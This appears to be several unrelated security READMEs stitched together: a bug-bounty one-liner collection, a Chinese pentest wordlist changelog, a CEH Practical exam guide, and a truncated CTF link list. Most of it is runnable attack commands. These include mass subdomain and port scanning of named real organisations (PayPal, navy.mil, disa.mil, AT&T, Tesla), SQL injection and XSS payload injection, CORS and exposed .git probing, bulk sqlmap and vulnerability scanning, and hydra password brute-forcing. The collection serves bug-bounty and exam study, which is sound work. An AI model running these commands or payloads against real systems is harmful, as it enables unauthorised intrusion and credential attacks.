### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters. ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) [![GitHub followers](https://img.shields.io/github/followers/bminossi.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/bminossi?tab=followers) [![GitHub followers](https://img.shields.io/github/followers/OfJAAH.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/OfJAAH?tab=followers) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Httpx](https://github.com/projectdiscovery/httpx) - [Findomain](https://github.com/Edu4rdSHL/findomain) ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me). ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained comand](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained comand](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained comand](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained comand](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained comand](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained comand](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained comand](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained comand](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained comand](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained comand](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained comand](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained comand](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained comand](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained comand](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained comand](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained comand](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained comand](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained comand](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained comand](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained comand](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained comand](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained comand](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/zeroc00I) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/willxenoo) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集,也欢迎感兴趣的大佬一起来完善。可直接提交PR,也可以提建议到issue。 ## 更新记录 **2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## todo - [ ] 文件名字、目录风格统一整理 - [ ] 英文版本的readme - [x] 网站指纹识别特征收集 - [x] 其他待添加 ## 来源&致谢(排名不分先后。目前还不全,会陆续完善) 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet)
# CEH-Practical-Guide This Repo will help you to prepare better for CEH - Practical Exam ### Exam Information - Exam Title: Certified Ethical Hacker (Practical) - Number of Challenges: 20 - Duration: 6 hours - Passing Score: 70% (14 Questions) ---------------------------------------------------------- ### My Experince - If you are doing bug bounty hunting, then you are half way there. - NMAP and wordpress knowledge is really important. - Best part - Google searches are allowed (💥) - Cryptographic knowledge is important - SQL Injection plays a major role - Simple User Enumeration and OS Banner grabbing - Stegnography - RDP Connection ---------------------------------------------------------- ### Tools that will help you to pass exam 1. NMAP 2. SQLMap 3. Hydra 4. Wireshark 5. Veracrypt 6. Hashcalc 7. Dirb 8. Steghide 9. Searchsploit 10. Hashcat 11. John 12. WPSCAN 13. Rainbow crack ( This helped me to get my first 3 question answers! ) 14. Nikto 15. Metasploit ---------------------------------------------------------- ### Resources 1. If you can pay then the best resource is ASPEN iLabs. 2. VulnHub 3. Tryhackme ( Different related rooms like crackthehash, wirectf, hydra, sqli) 4. ASPEN iLabs YT video ( https://www.youtube.com/watch?v=ycZFk-GT5-I&list=PLrrgFyE6PtlaCixUxJPM0Y9Peye6iCewH ) ---------------------------------------------------------- ### Sample Questions 1. Which username was tampered? ( You need to solving by comparing Hash values) 2. Wordpress Username Enumeration! 3. Retrieve Database names ( SQLi) 4. How many machines are there? ( NMAP) 5. Phone number of User X? ( Metasploit/Parameter Tampering) 6. What is the hidden text in X.jpeg (STEGHIDE) 7. Password crack for VCRYPT 8. IP Address/ Version of Running windows Server. ---------------------------------------------------------- ### Some of the commands used by me 1. hydra -l root -P passwords.txt [-t 32] <IP> ftp [ https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/] 2. hydra -L usernames.txt -P pass.txt <IP> mysql 3. hashcat.exe -m hash.txt rokyou.txt -O 4. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10 [https://www.stationx.net/nmap-cheat-sheet/] 5. wpscan --url https://10.10.10.10/ --enumerate u 6. netdiscover -i eth0 [ https://www.100security.com.br/netdiscover ] 7. john --format=raw-md5 password.txt [ To change password to plain text ] ---------------------------------------------------------- ### Reach out in case of further help Instagram: https://www.instagram.com/bug_xs/ Thank you for reading!! 🙌🙌
<div align="center" style="font-size: 25px;"> ## General 📚 </div> ## CTFs - [What is CTF?](https://www.youtube.com/watch?v=8ev9ZX9J45A) \- A video by LiveOverFlow introducing the idea of security Capture The Flag competitions. - [CTFtime](https://ctftime.org/) \- A site all about CTFs, with information on CTF teams, CTF ratings, CTF writeups, CTF archive and upcoming CTFs. - [CTF 101](https://ctf101.org/) \- A guide for techniques, thought processes, and methodologies to succeed in CTF competitions. - [Trail of Bits' CTF guide](https://trailofbits.github.io/ctf) \- A simple guide for getting into the CTF world and cyber security. - [CTFlearn](https://ctflearn.com/) \- An ethical hacking platform that enables tens of thousands to learn, practice, and compete. - [PicoCTF](https://picoctf.org/) \- Popular CTF created by students at CMU. - [RingZer0 CTF](https://ringzer0ctf.com/) \- RingZer0 Team's online CTF offers you tons of challenges designed to test and improve your hacking skills through hacking challenges. - [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) \- A curated list of Capture The Flag (CTF) frameworks, libraries, resources, softwares and tutorials. - [zardus/ctf-tools](https://github.com/zardus/ctf-tools) \- A collection of security tools that might be needed in a CTF. ## CTF Making - [CTF Design Guidelines](https://docs.google.com/document/d/1QBhColOjT8vVeyQxM1qNE-pczqeNSJiWOEiZQF2SSh8/mobilebasic) \- Design guidelines for CTF authors and organizers. - [How to make boot2root machines](https://fieldraccoon.github.io/posts/How-to-make-Boot2Root-machines) \- An article showcasing the setup process for a boot2root machine. - [pwning/docs](https://github.com/pwning/docs/blob/master/suggestions-for-running-a-ctf.markdown) \- PPP's tips and suggestions for running a CTF - [Kali Linux CTF 